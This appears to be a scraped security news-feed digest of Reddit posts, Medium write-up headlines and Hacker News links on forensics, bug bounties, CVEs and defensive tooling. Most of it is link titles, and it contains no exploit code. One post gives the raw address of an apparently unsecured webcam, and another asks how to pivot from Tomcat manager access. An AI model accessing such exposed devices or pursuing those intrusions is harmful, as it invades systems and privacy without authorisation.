    So I just set up a new OSSIM instance from scratch. I've added my API key (and have subsequently regenerated new ones for troubleshooting). I'm not sure how long I have to wait for the OTX subscriptions to sync and download to the OSSIM client, but when I click the dropdown on the OTX page in OSSIM, and click on View Account Details, it takes me to the otx.alienvault.com webpage, and shows that I'm not following or subscribed to any pulses.. However, if I log into OTX with the same account, it shows that I am subscribed to several. I've run the 'curl' command to test the OTX-API key and it worked without error. I've also noticed that another alarm I am receiving is "no information available. you are no longer subscribed to this pulse" but there is no information as to what pulse they're referring to. And googling it found an Alienvault KB that said it was fixed in 5.4. I'm on 5.8 (the latest version, up to date as well). Anyone else having this issue with Alienvault OSSIM and OTX not syncing? If there's a command to force sync (I've done the option in the console for updating the threat feeds), that would be appreciated. submitted by /u/Phyxiis [link] [comments]  ( 1 min )
    Building a forensics lab - what are must haves? Any templates?
    We have some spare resources and we're looking to build a dedicated forensics and analysis lab. We have a couple of PowerEdges we can use. The current plan is a segregated environment to clone suspect machines and see how they interact and do whatever analysis is required. I don't really know where to start except segregating it or having a faux network connection. It seems a lot of people just run labs locally, however we're required to essentially have thin clients. What has your team built for this? Any must have tools? submitted by /u/idnUygelps [link] [comments]  ( 3 min )
    What are the open source network scanning tools?
    We are a medium size healthcare medical center, maybe 300 nodes. What are the available open source /free tools I can use to achieve this use case ? Scanner that will say “2 new systems in this". Results should give me the OS version and check if antivirus is installed. submitted by /u/techno_it [link] [comments]  ( 1 min )
    Using Tomcat Virtual Host Manager
    I found access to Tomcat Virtual Host Manager on Tomcat 9 (not the one that deploys WAR files) which according to docs means the account has the role "admin-gui". I've been asked if I can pivot further using this but I'm completely stuck because I've never used it. All I can use is a form which can "Add Virtual Host" but from my testing (and limited experience with Tomcat) I've run into a halt. Anyone know if this can be used to privesc? submitted by /u/plutofoxtrot [link] [comments]  ( 1 min )
    LastPass free account with yubikey?
    LastPass free accounts by default don't support YubiKey. But LastPass supports Google Authenticator. In theory, they are all compatible because they use the same protocol. Can I just select "Google Auth." and then go ahead and use my Yubico Authenticator app? Thanks. Does anyone have experience with this? submitted by /u/mk_life [link] [comments]  ( 1 min )
  • Open

    Check Out The Full Speaker Line-Up of IWCON 2022
    Book your seats for the coolest, most value-packed cybersecurity event of 2022!  ( 2 min )
    Intigriti’s February XSS Challenge Walkthrough
    Today, I will be sharing about my solution on Intigriti’s February XSS Challenge 0222  ( 4 min )
    TryHackMe: Gallery
    Walkthrough  ( 3 min )
    Phishing Emails and Malware Traffic Analysis
    In this article, I use NetworkMiner, Wireshark and Hybrid-Analysis to analyze several malicious emails and a PCAP file that captured…  ( 11 min )
    Security Awareness — TryHackme
    You will understand what is security awareness and the importance of it  ( 2 min )
    Day 23 Cross-Site Scripting - Part 2#100DaysofHacking
    Get all the writeups from Day 1 to 21, Click Here Or Click Here.  ( 2 min )
    Hacking AWS Cognito Misconfiguration to Zero Click Account Takeover
    Hi all, hope you are keeping well and staying safe. This blog is about my recent Account Takeover finding. Continue reading on InfoSec Write-ups »  ( 4 min )
    Cyborg | TryHackMe Walkthrough
    Hack the backup file  ( 3 min )
    [Day 8] Special by John Hammond Santa’s Bag of Toys | Advent of Cyber 3 (2021)
    We will learn a little bit about forensic analysis in Windows.  ( 5 min )
    Install Invisible Malicious Apps Remotely, Acting As Updates
    Use Flickr app to install malicious apps remotely acting as updates. Continue reading on InfoSec Write-ups »  ( 3 min )
  • Open

    Dropping Files on a Domain Controller Using CVE-2021-43893
    submitted by /u/dmchell [link] [comments]
    cube0x0/KrbRelay: Framework for Kerberos relaying
    submitted by /u/dmchell [link] [comments]
    Persistence – Notepad++ Plugins
    submitted by /u/netbiosX [link] [comments]
    Install Invisible Malicious Apps Remotely, Acting As Updates
    submitted by /u/banginpadr [link] [comments]
    How I Hacked A Reputed Hacker
    submitted by /u/banginpadr [link] [comments]
  • Open

    Preventing, Detecting, & Hunting for Exploitation of the Log4j 2 Vulnerability
    Article URL: https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/ Comments URL: https://news.ycombinator.com/item?id=30335183 Points: 2 # Comments: 0  ( 28 min )
  • Open

    aimbot idea?
    I was thinking that what if there was a type of screen reader or something like that that detected enemy characters in a video game and locked your mouse to it? is that even possible? just an idea I don't know the technicalities submitted by /u/mr_killlerrrrr [link] [comments]  ( 1 min )
  • Open

    Netsparker Enterprise achieves WCAG 2.1 accessibility compliance
    Invicti is proud to break down barriers of access in software. Learn more about how we’ve achieved WCAG 2.1 AA compliance for accessibility standards. READ MORE  ( 3 min )
  • Open

    Dropping Files on a Domain Controller Using CVE-2021-43893
    Article URL: https://www.rapid7.com/blog/post/2022/02/14/dropping-files-on-a-domain-controller-using-cve-2021-43893/ Comments URL: https://news.ycombinator.com/item?id=30333641 Points: 2 # Comments: 0  ( 14 min )
    CVE-2021-23567
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2021-23567 Comments URL: https://news.ycombinator.com/item?id=30328625 Points: 4 # Comments: 4  ( 4 min )
  • Open

    SecWiki News 2022-02-14 Review
    SecWiki Weekly (Issue 415) by ourren; Summary of Java security research and secure development interview questions by ourren; Notes from an emergency response to a cryptomining virus by ourren. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    What are The Red Team and Blue Team in Cyber Security?
    The red team comprises offensive security experts that attempt to attack the cybersecurity defenses of an organization. On the other hand… Continue reading on Medium »  ( 1 min )
  • Open

    Small Business DFIR Services
    Hey all, I wanted to discuss something with this community. Recently I was asked to recommend DFIR services for a small business (<50 employees) after they were hacked. I started thinking and realized there was not any business I knew of to help small businesses. First, if anyone knows of a US-based company for DFIR services I would appreciate a suggestion. Second, I do not believe there is any low-cost DFIR company that is meant for small (or medium-sized) businesses. So, what do you think it would take for these large consulting firms, or even a government service, to provide accessible services to any small business that doesn't have the capital to hire the larger cybersecurity or consulting firms? I.e. create a special LICENSE on open source projects, organize a not-for-profit with rotating analysts, pro-bono cyber, etc. submitted by /u/Jklm264 [link] [comments]  ( 7 min )
  • Open

    Persistence – Notepad++ Plugins
    It is not uncommon for a Windows environment, especially dedicated servers managed by developers or IT staff, to have the Notepad++ text editor installed.… Continue reading → Persistence – Notepad++ Plugins  ( 5 min )
  • Open

    BotenaGo botnet source code leaked, adding another weapon to attackers' arsenals
    In November 2021, AT&T Alien Labs first disclosed BotenaGo, malware written in Golang. Recently the malware's source code was uploaded to GitHub, which could spawn more malware variants.  ( 1 min )
    FritzFrog is expanding rapidly; nearly 40% of victims are in China
    FritzFrog spreads mainly by brute-forcing SSH and deploys its malware once the brute force succeeds. Researchers found that about 37% of FritzFrog's compromised hosts are located in China.  ( 1 min )
    FreeBuf Morning Report | The revised Cybersecurity Review Measures take effect today; Zhihu says it did not use a behavior-sensing system to monitor employees
    Zhihu stated that illegal collection of personal information is fundamentally at odds with Zhihu's values, and that it has always firmly opposed this kind of system.  ( 1 min )
    Over $602 million! Ransomware payments hit a record high in 2021
    Surveys show that the ransomware threat continued to grow worldwide in 2021. Organizations and institutions around the world paid more than $600 million in cryptocurrency over the past year.
    A declassified document reveals the CIA has been secretly collecting information on US citizens at home
    According to a document declassified on February 10, the US Central Intelligence Agency has been secretly collecting data on domestic US citizens without congressional authorization.  ( 1 min )
    Apple patches a new zero-day vulnerability
    Apple has patched a new WebKit zero-day vulnerability.  ( 1 min )
    Half of all email worldwide in 2021 was spam
    According to Kaspersky's latest report, more than half of email last year was spam  ( 1 min )
    HEYTEA lays off its entire security department; what do you make of it?
    Security departments are so undervalued that when a company runs into business trouble they are almost the first to be cut, to reduce operating costs.  ( 1 min )
    How to recruit security R&D talent well: building a team model
    For a cybersecurity technology company, the most valuable asset is talent. Generally, around 70% of a company's costs are personnel costs; without the right people, every grand technological ambition remains an illusion  ( 1 min )
  • Open

    grave headstones
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Cams at an Asian hog farm
    http://27.156.152.250:8889/ If you're lucky you'll see the grumpy old farmer. Warning, possibly some dead animals and cruelty. -edit submitted by /u/inoculatemedia [link] [comments]
  • Open

    ModifiedElephant: lurking for a decade, an Indian hacking group surfaces
    Translator: Knownsec 404 Lab translation team. Original link: https://assets.sentinelone.com/sentinellabs-apt/modified-elephant-apt Summary: Our research attributes this decade of activity to a threat actor we call ModifiedElephant. ModifiedElephant carries out targeted attacks against human rights activists, human rights defenders, academics and lawyers across India, with the aim...
  • Open

    Intigriti XSS Challenge 0222 — Write-Up
    XSS challenge by intigriti Solved by Th3Mind Continue reading on Medium »  ( 3 min )
    Intigriti’s February XSS Challenge Walkthrough
    Today, I will be sharing about my solution on Intigriti’s February XSS Challenge 0222 Continue reading on InfoSec Write-ups »
    #Bug Bounty - How I was able to purchase a premium feature for just “1” PKR by (Parameter…
    Price Manipulation Continue reading on Medium »  ( 1 min )
    100 Days of Hacking — DAY 9
    Objectives of day 9 : Continue reading on Medium »  ( 1 min )
    Install LinkFinder on Kali Linux
    LinkFinder : a tool written in python that finds the endpoints from/in JavaScript files. Continue reading on Medium »  ( 1 min )
    How to Setup/Configure Burpsuite with Firefox
    Hello all, I am back with another blog on bug bounty. We will see how we can set up/configure Burp Suite with Firefox to intercept all… Continue reading on Medium »  ( 1 min )
    Exploiting CVE-2019–5418- File Content Disclosure on Rails
    In Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1, and v3, a File Content Disclosure vulnerability exists where properly designed… Continue reading on Medium »  ( 1 min )
    Broken Link Hijacking - Mr. User-Agent
    Summary : Continue reading on Medium »  ( 3 min )
    Bug Bounty Stress aka Burnout: do and don’t
    Don’t stress yourself too much Continue reading on Medium »  ( 3 min )
  • Open

    How do Secrets Managers help?
    Nearly everyone seems to say that the best way to store secrets in a cloud environment is to put them in a secrets manager and only fetch them when needed. This has the advantage of allowing seamless key rotation, adding IAM policies, etc. Does this actually increase the security posture of the app though? The app still needs to authenticate with a key manager somehow - I would guess by way of an API token or similar. If the app or the box serving the app get owned, doesn't this basically compromise all the secrets in the secret manager accessible to the app? Also, assuming my previous statement is correct, there must be a "bootstrapping secret" which is injected to the app that lets it talk to the secrets manager. How does the app get access to that secret? I don't mean in a specific cloud (e.g. Azure, GCP, AWS) - just in general, how does whoever is providing the secret know to trust the app? submitted by /u/parallelocat [link] [comments]  ( 1 min )
    How do I use Kape to capture a memory image and upload it to S3?
    I'm in the FOR508 class right now, playing around with KAPE. I was able to get it to run the !SANS_Triage target and upload the results to an S3 bucket. This will be amazing for doing IR on remote computers, what an awesome tool! I'm also able to get Kape to create a memory image using the DumpIt_Memory module but so far I haven't been able to get it to send a memory image to S3. Is that possible? Here's a sample for how I got the !SANS_Triage target to send to S3: .\kape.exe --tsource C: --tdest D:\kape\acquired\SANS_Triage_%d%m --tflush --target !SANS_Triage --vss --vhdx S3_SANS_Triage_ --s3r us-east-1 --s3b bucket123 --s3k THISISMYACCESSKEYID --s3s ThIsIsMaHsUpErSeCrEtAcCeSsKey123456789+++ --s3st hQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9X Is this the way? From what I can tell the only way to generate a temporary AWS logon was using the CLI. Create a new user that only has put/write access to the S3 bucket you want to use then run: PS C:\Program Files\Amazon\AWSCLIV2> aws sts get-session-token --duration-seconds 129600 submitted by /u/mnbitcoin [link] [comments]  ( 1 min )
    Given that smart light bulbs can be 'hidden' in plain sight, and most of them are reflashable - how long will it be until the first one is used to gain a foothold inside a target network?
    I was actually looking for something to use as a PWNplug, but even those stand out a bit, whereas wifi light bulbs are ... just light bulbs, with wifi, and a devkit. https://hackaday.com/2020/02/11/custom-firmware-for-cheap-smart-bulbs-is-a-cinch-to-tinker-with/ Most of them seem to be based on the same Espressif chipset https://github.com/ct-Open-Source/tuya-convert https://github.com/arendst/Tasmota This was more of a rhetorical question, but I thought it might interest some of you. submitted by /u/boli99 [link] [comments]  ( 3 min )
    Career in Bug Bounty?
    I read an article about a pen tester making 300k off a bug bounty. My question is can someone live off this? Can anyone do this with the right knowledge and training? Do you have to be some sort of genius? submitted by /u/Bugskee [link] [comments]  ( 3 min )
  • Open

    Who Needs A Niche Threat Actor Specific IoC (Indicator of Compromise) STIX/STIX2/TAXII Feed?
    UPDATE: The feed's official web site including the brochure. Dear blog readers, Who needs access to my STIX/STIX2/TAXII Threat Actor Specific IoC (Indicator of Compromise) feed? Drop me a line today at dancho.danchev@hush.com Stay tuned!
  • Open

    Resource/Reference for Crypto mining Artifacts?
    Looking for a good resource (web page, poster, graphic etc.) for locating artifacts that indicate the use of a crypto miner on a computer. Does anyone know of anything? submitted by /u/admincee [link] [comments]  ( 1 min )
    Magnet Web Page Saver
    Has anyone here had working experience with the free tool Web Page Saver? I am looking into using it at my lab and have some serious questions about how it works and when/what cases it should be used with. Any guidance is appreciated submitted by /u/trex4n6 [link] [comments]  ( 1 min )
    Bulk Extractor Review
    Howdy all! Newbie alert! So I currently started using Bulk_Extractor with Volatility for Memory Forensics! My real question is how reliable are the results obtained from Bulk Extractor? I see a lot of explicit websites in my Bulk Extractor Domain Histogram results! But I can't find them in Volatility! Any idea of how this works? submitted by /u/GloryHunter9 [link] [comments]  ( 1 min )
  • Open

    Ask HN: Vulnerability Research in 2032?
    Hi HN, I've always been curious about bug hunting. Finding vulns. I have some foundational knowledge like fuzzing, basic web security and reading assembly, but I am also aware of all the improvements in software and web security and there are so many new tech stacks, languages and platforms these days. Where does one begin? Is it worth learning how to find memory safety vulns given how C and friends are dying (and when they are alive things like CFG and appguard make it impossible to exploit them)? Are there any modern books or sites you recommend? Should I be learning some language (rust/go?) or stack (k8s?) as a prerequisite? Comments URL: https://news.ycombinator.com/item?id=30324988 Points: 1 # Comments: 0  ( 1 min )
    Apple emits emergency fix for exploited-in-the-wild WebKit vulnerability
    Article URL: https://www.theregister.com/2022/02/11/apple_emergency_webkit/ Comments URL: https://news.ycombinator.com/item?id=30324643 Points: 4 # Comments: 3  ( 9 min )

    SysWhispers Shellcode Loader w/ ETW patching, anti-sandboxing, and 6 execution options
    submitted by /u/ChadMotivation [link] [comments]

    What is a Skip Tracer?
    Skip tracing is the process of tracking down people who are particularly hard to find, whether they’re persons-of-interest, fact witnesses… Continue reading on Medium »
    Creating a Honeypot
    First it’s important to describe what a honeypot is and why it’s a good idea to create one. In the cyber security field a honeypot is… Continue reading on Medium »  ( 9 min )

    SecWiki News 2022-02-13 Review
    No news has been updated today~ For more recent articles, please visit SecWiki  ( 2 min )

    Mostly big boobs photos (NSFW)
    submitted by /u/Boobalizer [link] [comments]

    Summary of PHP-related CTF challenge topics (Part 2)
    This article summarizes the PHP-related topics I encountered while solving ctfshow challenges. Summarizing only the knowledge points and exam points would be rather hollow and hard to understand, so I summarize each topic through the challenges themselves, which makes it easier to follow.  ( 2 min )
    Summary of PHP-related CTF challenge topics (Part 1)
    This article summarizes the PHP-related topics encountered in ctfshow challenges.  ( 2 min )

    Widespread CSRF on authenticated POST endpoints
    UPchieve disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1309435

    CVE-2021-45464 – LKVM Escape
    Article URL: https://www.kalmarunionen.dk/writeups/2021/hxp-2021/lkvm/ Comments URL: https://news.ycombinator.com/item?id=30320463 Points: 4 # Comments: 0  ( 11 min )
    The long road to a fix for CVE-2021-20316
    Article URL: https://lwn.net/SubscriberLink/884052/c946bb7f8d39c54e/ Comments URL: https://news.ycombinator.com/item?id=30319122 Points: 8 # Comments: 0  ( 16 min )


    Biohazard- Tryhackme CTF
    This is a write-up about the Biohazard CTF room from Tryhackme (a free cybersecurity training site that provides machines for you to… Continue reading on Medium »  ( 8 min )
    Exploit SUID misconfiguration for privilege escalation
    In this article, I am going to explain what SUID binaries are and how to exploit them for getting a root shell, i.e. privilege escalation on the… Continue reading on Medium »  ( 2 min )

    [h1-2102] Break permissions waterfall
    Shopify disclosed a bug submitted by hogarth45: https://hackerone.com/reports/1088159 - Bounty: $500
    Blind XSS on Twitter's internal Jira panel at allows exfiltration of hackers reports and other sensitive data
    Twitter disclosed a bug submitted by iambouali: https://hackerone.com/reports/1369674 - Bounty: $5040

    My Pentest Log -6-
    Greetings Everyone from Hippodrome (Constantinople), Continue reading on Medium »  ( 2 min )
    100 Days of Hacking — Day 8
    Objectives of day 7 : Continue reading on Medium »  ( 1 min )
    Basic Web Technologies Knowledge required for starting with the web Exploitation Part-3
    Hello Hackers, hope you are doing well. I, Manan Aggarwal, a BTech student, am here to present you the blog in the continuation of… Continue reading on Medium »  ( 6 min )
    A tale of 0-Click Account Takeover and 2FA Bypass.
    Hey, it’s been a long time since I published a bug bounty write-up. I was in an internship period. So, I had a lot of free time. Anyways… Continue reading on Medium »  ( 2 min )
    Hacking My ISP For FREE Internet
    Note: This article is only for educational purpose. Continue reading on Medium »  ( 2 min )
    PORTSWIGGER WEB SECURITY - BROKEN ACCESS CONTROL LAB SOLUTIONS
    Access Control or Authorization is about who or what, with respect to the requested actions or the resources being accessed,… Continue reading on Medium »  ( 10 min )
    HOW I GOT THE BOUNTY OF $280+ in just a matter of seconds…
    Hey folks, Continue reading on Medium »  ( 2 min )
    Improving the impact of a mouse-related XSS with styling and CSS-gadgets
    I will write more about how I make PoCs in the future. But with special care, I work out scenarios for vulnerabilities that need user… Continue reading on Medium »  ( 2 min )
    Attack Surface Monitoring using Open-Source Intelligence
    The paper introduces the case study for attack surface analysis and monitoring with practical application of open-source intelligence… Continue reading on Medium »  ( 7 min )
    Bug Bounty: My First Five Figure Payout
    This is the post from my Telegram channel about Bug Bounty, where I share my experience and knowledge as well as just write about being… Continue reading on Medium »  ( 2 min )

    SecWiki News 2022-02-12 Review
    Research and analysis on fixing security vulnerabilities in open-source packages and the software supply chain by ourren; The eighteen levels of hell of offense-defense confrontation by ourren; For more recent articles, please visit SecWiki  ( 2 min )

    OSINT Automation Tool — Spiderfoot
    Spiderfoot Continue reading on Medium »  ( 1 min )
    Valerie vs Valoree
    Yes, this is really happening.  No, I’m not running to cause ballot confusion. Continue reading on Medium »  ( 1 min )
    How To Find Timestamps For Verification
    Finding exact timestamps in web material is a must-have ability for OSINT and verification researchers, but where do you look? Continue reading on Medium »

    The Top 13 Ethical Hacking Courses on Udemy (2022)
    submitted by /u/Jan_Prince [link] [comments]

    Technical documents for JOINT POLAR SATELLITE SYSTEM
    A little over my head but if any climate geeks want to access raw data, here's the tools. Main index directory: https://www.jpss.noaa.gov/assets/ Community Satellite Processing Package (open source direct broadcast): http://cimss.ssec.wisc.edu/cspp/ Example: https://www.jpss.noaa.gov/assets/pdfs/technical_documents/472-00340_J2_HRD_to_DBS_RF_ICD_Rev_C.pdf API references: https://www.jpss.noaa.gov/sciencedocuments/sciencedocs/2015-06/474-00019-01_JPSS-API-Users-Guide-Vol-I_0123A.pdf https://www.jpss.noaa.gov/sciencedocuments/sciencedocs/2015-06/474-00019-02_JPSS-API-Users-Guide-Vol-II_0124-.pdf submitted by /u/inoculatemedia [link] [comments]
    Audio and art programs (mostly) for Atari 2600
    http://www.qotile.net/files/ submitted by /u/inoculatemedia [link] [comments]

    Exploring API penetration testing for modern applications with separated front end and back end
    More and more domestic internet companies have jumped on the front-end/back-end separation bandwagon to speed up development and test iteration and to unify their front ends. With these new front-end frameworks, testing APIs more efficiently becomes ever more important.  ( 1 min )
    NodeJS heap overflow? The cause is the default memory cap. Lift the seal!
    Applications built with NodeJS that need to process large amounts of data may hit a heap overflow; the error message contains "JavaScript heap out of memory".

    CISSP Domain 1 - Episode 5 - Security Roles and Responsibilities, Control Frameworks, Due care & Due Diligence, Policies, Standards, Procedures, Guidelines & Baseline and Threat Modeling by Get Set CISSP
    submitted by /u/Tradition_Wonderful [link] [comments]  ( 1 min )

    How do I get my foot in the door with forensics?
    I have my master’s in digital forensics but like a fool I never did anything with it. I’m a quick study and it will only take me about a week or two to relearn everything. I have a security clearance and am currently in government contracting as a project manager, but no company is biting. I want to finally make the switch but it’s hard when you don’t have in-lab experience or the certs. Any advice on how to get restarted in this field? TIA! submitted by /u/kindreddino [link] [comments]  ( 6 min )
    Imaging Android and iOS devices
    Hello, can anyone teach me how to image these devices? Or if you can, point me to some tutorials. I have been trying to learn but I keep failing. Thanks in advance. submitted by /u/Sudden_Ad9859 [link] [comments]  ( 1 min )

    Soon you will no longer be able to set document.domain in Chrome ⚠️
    Chrome will disable modifying document.domain to relax the same-origin policy. Google recently announced a change to the Chrome browser regarding document.domain. Since the three major browser vendors tend to keep their policies similar, Firefox and Safari will probably change in a similar way. In short, from Chrome 106+ the setter for document.domain is removed by default. document.domain Actually, document.domain has some problems. Because document.domain ignores the port number part of the domain, if services are served on different ports of the same domain, they would normally not be same-origin, but document.
    ZAP's new Networking Stack
    Last Thursday night, simon shared something in the ZAP Developers Groups. It was about ZAP's Networking Layer, and as soon as I saw the title I had a hunch what it was about. (It is something I had really been waiting for 🤩) The networking stack has changed in the Weekly version! Let's take an early look at what this work was meant to improve, what has changed, and what comes next :D Why? First, very little of the networking stack or layer is actually visible to users. It is the part that handles networking inside the application, and since ZAP is an old project, the networking code it was built on used the old Apache Commons HttpClient library.

    Apple fixes Mac battery drain, WebKit vulnerability in software updates
    Article URL: https://arstechnica.com/gadgets/2022/02/apple-patches-security-holes-and-bugs-with-ios-15-3-1-and-macos-12-2-1/ Comments URL: https://news.ycombinator.com/item?id=30308727 Points: 2 # Comments: 0  ( 3 min )


    Simple tool to find client side prototype pollution vulnerability
    submitted by /u/boch33n [link] [comments]
    Pre-auth WAN remote root for Cisco RV340 VPN Gateway Router
    submitted by /u/ChoiceGrapefruit0 [link] [comments]
    Cisco ASDM: Manage at Your Own Risk
    submitted by /u/chicksdigthelongrun [link] [comments]
    WordPress < 5.8.3 - Object Injection Vulnerability
    submitted by /u/monoimpact [link] [comments]  ( 1 min )
    A simple tool to audit Linux system libraries to find public security vulnerabilities.
    submitted by /u/CoolerVoid [link] [comments]  ( 1 min )
    AD CS: from ManageCA to RCE - BlackArrow
    submitted by /u/Margaruga [link] [comments]
    Internet-Wide Study: State Of SPF, DKIM, And DMARC - RedHunt Labs
    submitted by /u/redhuntlabs [link] [comments]  ( 1 min )

    Mellium 0.21.1 fixes CVE-2022-24968
    Article URL: https://mellium.im/cve/cve-2022-24968/ Comments URL: https://news.ycombinator.com/item?id=30308038 Points: 1 # Comments: 0  ( 1 min )
    Apple fixes actively exploited zero-day (CVE-2022-22620)
    Article URL: https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/02/update-now-apple-fixes-actively-exploited-zero-day/ Comments URL: https://news.ycombinator.com/item?id=30304109 Points: 1 # Comments: 0  ( 3 min )

    How safe is this obscure software my friend bought on eBay?
    My friend is having technical difficulties with his iPad (he reset it and you can’t get through the welcome/setup without allowing remote access management to a certain company, which he doesn’t want to do) and he bought some software on eBay that promises to help bypass that error. His computer is old and won’t run the software when he tries to. My MacBook is brand new and so he asked me if I could download the eBay software onto my computer to try to fix the iPad. To me that doesn’t seem like something I want to download onto my new laptop. Maybe I shouldn’t have binged all of the darknet diaries podcast but idk doesn’t feel safe. Here’s what it looks like. Any thoughts? submitted by /u/aimhighswinglow [link] [comments]  ( 4 min )
    Is it safe to feed patterns to hashing functions in order to create passwords for websites?
    I had this idea on how to generate supposedly safe passwords for different websites/accounts that wouldn't require passwords to be memorized or stored. The idea is to: 1 - Come up with a short default string that would never change (say, "bubly42"). 2 - Append the name of the website to that string for each website you make an account on. For example, when creating an account for airbnb it'd produce the string "bubly42airbnb". 3 - Run that string (bubly42airbnb) through a hash function. 4 - Use the output of the hash function as the password for the website. This would have the upside of not requiring memorization or storage of passwords, while still generating a unique password for each site. I can just generate the password on the fly. Obvious downside is that if someone figures your pattern out, they pretty much can figure out all of your passwords. Is there anything else that I'm missing? Is this considered safe? (Btw, sorry if I'm posting in the wrong place. If that's the case, can someone direct me to a good subreddit to post this in?) submitted by /u/djoncho [link] [comments]  ( 4 min )
    Possible malware in official Torguard windows VPN client ??
    Torguard's VPN client intermittently consumes 50% cpu, for long periods, unrelated to any network activity, which I find suspicious. Details below. I've raised this with TG's tech support who have repeatedly denied that any such behavior exists. I'm seeing this consistently on 4 windows machines (including one VM) where I have TG running. I'm not sure where to report this as there is no TG subreddit and the VPN subreddit doesn't allow mentioning specific services. Hopefully you folks can point me in the right direction or give advice. So, if the app is running and the VPN is connected, even if there are no other apps open, TG client will randomly begin consuming a constant 50% CPU. I can't correlate this with any other condition like network traffic or other app activity or any obvious thing TG is doing. If I minimize the TG client window, it stops. And then it starts again in a few minutes, and so I repeat this remedy, and it stops. If I don't do this it continues indefinitely. So, every computer this is running on experiences a significant heat/wattage increase and CPU performance degradation due to TG. I took screenshots of this behavior using task manager. I also watched it using winternals' process monitor, which gave much more detailed info than this. ---- But this forum doesn't allow pictures. submitted by /u/Dougolicious [link] [comments]  ( 2 min )
    How to get over the unrecognized app/publisher warning in Windows
    All, I am writing an executable to put on a website for download. Every time I go to download it, I get an "unrecognized app, unknown publisher warning". It's not tagged as malicious, but it's tagged as "unknown publisher" which makes it appear that way. Does anyone know how to add a publisher? Is that something a non-corporation can do? Or could I at least add a certificate or something to make Windows calm down? submitted by /u/iExtrapolate314 [link] [comments]  ( 1 min )
    How to get access on clean-mx.de
    Correct me if I am on the wrong subreddit. I have seen some people talk about this site in here, but how do you get access on clean-mx? I tried creating an account in there (registration form), but I haven't got a response back, unless I am being impatient. I also tried contacting the email, but it is dead as stated on the site. There are multiple sites to register accounts, xlogin.php, xregister.php, etc. I can see it's alive because when I search the site up, I see dates from right now. Is this site restricted to companies only or not? Can you not register anymore? (Couldn't post this in another subreddit, my post kept getting removed because they thought it was a tech-support question) submitted by /u/RainbowIsRainbow [link] [comments]  ( 1 min )
    What security monitoring tools can accomplish this scanning and detection?
    Hi Folks, As the title says, what tools can help to achieve these objectives? Scan the network in real time to detect the presence of unauthorized hardware, software, and firmware components within the network. Scan and detect in real time the addition of devices to the network and notify the security administrator via email. submitted by /u/techno_it [link] [comments]  ( 3 min )
    Pen test dropbox running Win OS with Kali VM - with 4G callback
    Looking for some hardware advice for a pen test dropbox. I'd like the unit to be responsive with desktop-speed chipsets, x86/x64 based, and have an out-of-band 4G SIM callback for when client networks prevent outbound connectivity. With Windows as the primary OS, is there any way to auto connect the 4G/cellular modem with Windows, as there is with Linux (ie wvdial)? Are there any capable NUC type devices or mini PCs with inbuilt 4G capability. Want to avoid having USB modems sticking out the side, perhaps similar to rPi's cellular hat, but not rPi (or other SBCs) which would struggle with a Win with Kali VM setup. Happy to spend a bit on hardware, are there many notable boxes other than the Intel NUC, Zotac Zbox or MSI Cubi? Seen a few decent build docs that almost fit the bill, but not quite: https://infosecwriteups.com/part-2-build-the-pen-test-drop-box-69278526886a https://www.blackhillsinfosec.com/pentesting-dropbox-on-steroids/ https://www.blackhillsinfosec.com/how-to-build-your-own-penetration-testing-drop-box/ https://www.sprocketsecurity.com/blog/penetration-testing-dropbox-setup-part1 Thanks! submitted by /u/ama21n [link] [comments]  ( 1 min )
    Would a "technical support specialist" be a good start to eventually end up in cyber security?
    Hello. I'm graduating college soon and have an offer as a support specialist. The responsibilities are as follows: Provide 1st-tier technical support for production support issues; Troubleshoot system errors by reviewing technical logs, system documentation, and application logic; Monitor and triage errors generated by automated tasks in production; Collaborate with Client Excellence team to ensure users’ technical support issues are resolved quickly; On call rotation for urgent production issues during weekends and holidays. I've been applying to IT jobs but have had little luck. Would a job like this be a good introduction into security? Or should I look for a more traditional IT job? submitted by /u/Hellothere6667 [link] [comments]  ( 1 min )

    LNK Files, Again
    What, again?!?! I know, right?!? Not long ago, I read this fascinating article from Joe Helle that discussed malicious uses for Windows shortcuts, or LNK files, and also discussed a Python3 script called "lnkbomb". As a side note, check out what Joe had to share about persistence via WSL2! As anyone who's followed me for a minute knows, I love...L   O   V   E...me some LNK files. Shortcut files are something that we see all the time, have been around for a long time (much like ADSs), but folks in the DFIR field are so focused on the "shiny hot newness", that this file type is very often overlooked and not fully exploited. The technique Joe discusses is similar to modifying the iconfilename field of a shortcut file, so that even if the "bad guy" is evicted from an infrastructure, any action that launches the LNK file results in credentials being passed via HTTP or WebDAV, where they can be collected, cracked, and then used by the threat actor. LNK files have a lot of uses, and understanding the format and structure is helpful in a lot of different ways. One example is that automatic JumpLists follow the OLE/structured storage format, and all but the DestList stream consist of LNK file formatted streams. Another example is that the building blocks of LNK files, shell items, are also the core building blocks of several Registry-based artifacts, such as shellbags. Beyond that, however, threat actors have used LNK files as lures in social engineering and phishing attacks; this means that the threat actor has built the LNK files within their own infrastructure, within their own development environment. As such, sending these files as lures is "free money" to both DFIR and CTI analysts, if they're able to leverage those files and their component metadata.
